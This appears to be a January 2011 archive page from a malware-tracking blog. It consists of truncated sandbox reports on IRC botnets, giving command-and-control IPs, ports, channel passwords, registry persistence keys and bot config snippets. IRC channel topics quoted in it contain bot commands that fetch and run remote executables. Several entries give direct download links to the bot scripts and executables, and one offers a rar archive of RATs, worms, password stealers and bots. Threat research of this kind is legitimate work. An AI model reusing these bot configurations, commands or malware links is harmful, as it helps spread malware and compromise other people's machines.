Month: January 2011

Resolved : [bad-girl.no-ip.biz] To [91.97.55.200] Remote Host Port Number 91.97.55.200 58281 Registry Modifications The following Registry Key was created: HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{E3FB2449-64ED-226C-A731-D39F73A3069B} The newly created Registry Values are: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{E3FB2449-64ED-226C-A731-D39F73A3069B}] StubPath = “%System%svhost32.exe” so that svhost32.exe runs every time Windows starts [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] Windows Host Prozess = “%System%svhost32.exe” so that svhost32.exe runs every time WindowsRead more...

var $config = array(“server”=>”50.22.148.142”, “port”=>1345, “pass”=>””, “prefix”=>”ClickDown”, “maxrand”=>4, “chan”=>”#dada”, “key”=>””, “modes”=>”+s”, “password”=>”click”, “trigger”=>”.”, “hostauth”=>”*” // * for any hostname Invisible Users: 31 Channels: 1 channels formed Clients: I have 32 clients and 0 servers Local users: Current Local Users: 32 Max: 779 Global users: Current Global Users: 32 Max: 288 download link here: http://50.22.148.142/pepinas.txt? moreRead more...

DNS QueriesDNS Query Text blenderartists.org IN A + zonetf.com IN A + zonedg.com IN A + freeonlinedatingtips.net: type A, class IN, addr 69.42.208.146 bigspiderwomen.com: type A, class IN, addr 64.191.90.101 sharewareconnection.com: type A, class IN, addr 216.240.159.81 HTTP QueriesHTTP Query Text zonetf.com POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvfuFuTLiv0agDgGxMl%2FvDr3WCGkrg%2B8OtBfBvOZTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D HTTP/1.1 blenderartists.org GET /external/Banners/facebook2.jpg?tq=gHZutDyMv5rJcyG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0 zonedg.com GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917W65rJqlLfgPiWW1cg HTTP/1.0 Threads CreatedPIdRead more...

Remote Host Port Number 124.217.248.138 20 PASS google_cache2.tmp NICK n{Ganja-USA|XP}752152 USER 5074 “” “TsGh” :5074 JOIN #panama PONG :irc.sdfadsf.com another dbs same ip: – DNS Queries: Name Query Type Query Result Successful Protocol security10.sytes.net DNS_TYPE_A 124.217.248.138 YES udp – IRC Conversations: From ANUBIS:1039 to 124.217.248.138:20 Nick: n{Ganja-AUT|XP}731969 Username: 0359 Server Pass: google_cache2.tmp Joined Channel: #mexicoRead more...

jjjjjj.ahrampress.net ip: 123.183.217.32 jjjjjj.ahrampress.net:6943 123.183.217.32 5943 123.183.217.32 6943 PASSWORD: eee Nick [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #j Channel: #j Topic is ‘.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0Read more...

Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 61.136.59.34 80 123.183.217.32 5943 123.183.217.32 6943 27.54.225.102 6943 PRIVMSG #dc1 :Err0r.. MODE [N00_USA_XP_7890652] @ -ix 00000030 | 5F36 3033 3038 3139 5D18 E740 0D0A 7365 | _6030819]..@..se 00000040 | 6E64 2023 6A2C 234D 6120 6F6F 6F6F 0D0A | nd #j,#Ma oooo.. 00000050 | 5052 5256 4D53 4720Read more...

irc conection: $servidor=’75.46.208.5′ unless $servidor; my $porta=’9191′; Channels: 5 channels formed Clients: I have 103 clients and 0 servers Local users: Current Local Users: 103 Max: 143 Global users: Current Global Users: 103 Max: 417 bot link : http://80.73.145.20/seguridad/c.txt downloader link: http://80.73.145.20/seguridad/ec.txt? rabot.txt: http://80.73.145.20/seguridad/rabot.txt infos about hosting: http://whois.domaintools.com/75.46.208.5

Remote Host Port Number 70.39.71.240 51987 NICK {New}[USA-1244024-XP] USER 8408605 “” “lol” :8408605 JOIN ##Crysis Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + winlog = “%Temp%lsass.exe” so that lsass.exe runs every time Windows starts Memory Modifications * There was a new process created in the system: Process Name Process Filename MainRead more...

inside the rar u have diferent malwares like rats,worms,passwd stealers,bots;mass emailers etc Download: http://81878971.filesonthe.net

play.mygreatbar.com: type A, class IN, addr 61.136.59.34 UDP Protocol Dest IP:61.136.59.34 Dest Port:1863 exe file here: http://91.217.162.104/m.exe infos about hosting: http://whois.domaintools.com/61.136.59.34